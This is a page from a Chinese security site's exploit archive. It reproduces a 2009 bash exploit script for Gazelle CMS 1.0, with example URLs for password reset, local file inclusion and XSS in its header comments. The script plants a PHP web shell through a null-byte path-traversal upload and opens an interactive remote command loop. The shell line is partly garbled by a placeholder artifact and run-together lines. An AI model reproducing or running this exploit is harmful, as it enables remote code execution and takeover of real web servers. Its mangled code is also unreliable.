首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Gazelle CMS version 1.0 suffers from password reset, local file inclusion, cross
来源:sheewhite[at]googlemail.com 作者:white_sheep 发布时间:2009-08-14  
#!/bin/bash
#       Gazelle CMS 1.0 Multiple Vulnerabilities
#       Script Download: http://www.anantasoft.com/index.php?Gazelle%20CMS/Download
#       Found by white_sheep on 11/08/2009
#       Contact: sheewhite@googlemail.com - https://www.ihteam.net
#       Need magic_quote_gpc Off for RCE and LFI
#       Thanks to R00T[ATI]
#
#               PASSWORD RESET:
# http://localhost/gazelle/renew.php?user=[username]
#
#               LFI:
# author: fuzion (milw0rm.com/author/1343)
# http://localhost/gazelle/index.php?template=[LFI]
#
#               XSS:
# http://localhost/gazelle/user.php?user=</title>[XSS]
# http://localhost/gazelle/search.php?lookup=<script+type="text/javascript">[CODE]</script>
#
#               RCE:
echo
echo "###############################################"
echo "#             GazelleCMS 1.0 RCE              #"
echo "#  by white_sheep				    #"
echo "#  sheewhite[at]googlemail[dot]com            #"
echo "#						    #"
echo "#           https://www.ihteam.net            #"
echo "###############################################"
echo


EVILC='<?php passthru(
___FCKpd___0
GET[cmd]); ?>' echo -n "Insert url with path (ex.: http://localhost/gazelle): " read SITE PAGENAME=/modules/menu$RANDOM'.bak.php' curl -F "siteTitle='INIT'$EVILC'EOF';type=text/html" $SITE'/admin/settemplate.php?customizetemplate=..'$PAGENAME'%00' 1>/dev/null 2>/dev/null if [ "`curl -s $SITE''$PAGENAME | grep siteTitle`" == "" ] then echo "[-] Not Vulnerable :( byee" exit fi while true do echo -n "sh$: " read -r CMD CMD=`echo $CMD | sed 's/ /+/g'` echo $CMD curl -s "$SITE$PAGENAME?cmd=$CMD" | sed "s/.*'INIT'//g;s/'EOF'.*//g" echo done

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Wordpress Plugin WP-Syntax <=
·Safari 4 versions prior to 4.0
·JBLOG 1.5.1 Remote SQL Table B
·Linux Kernel 2.x sock_sendpage
·EmbedThis Appweb v3.0B.2-4 Mul
·Linux Kernel 2.x sock_sendpage
·pIPL 2.5.0 (.PLS /.PL) Univers
·VLC Media Player <= 1.0.1 smb:
·VLC Media Player 1.0.0/1.0.1 s
·FTPShell Client 4.1 RC2 Name S
·EmbedThis Appweb version 3.0B.
·Easy Music Player version 1.0.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved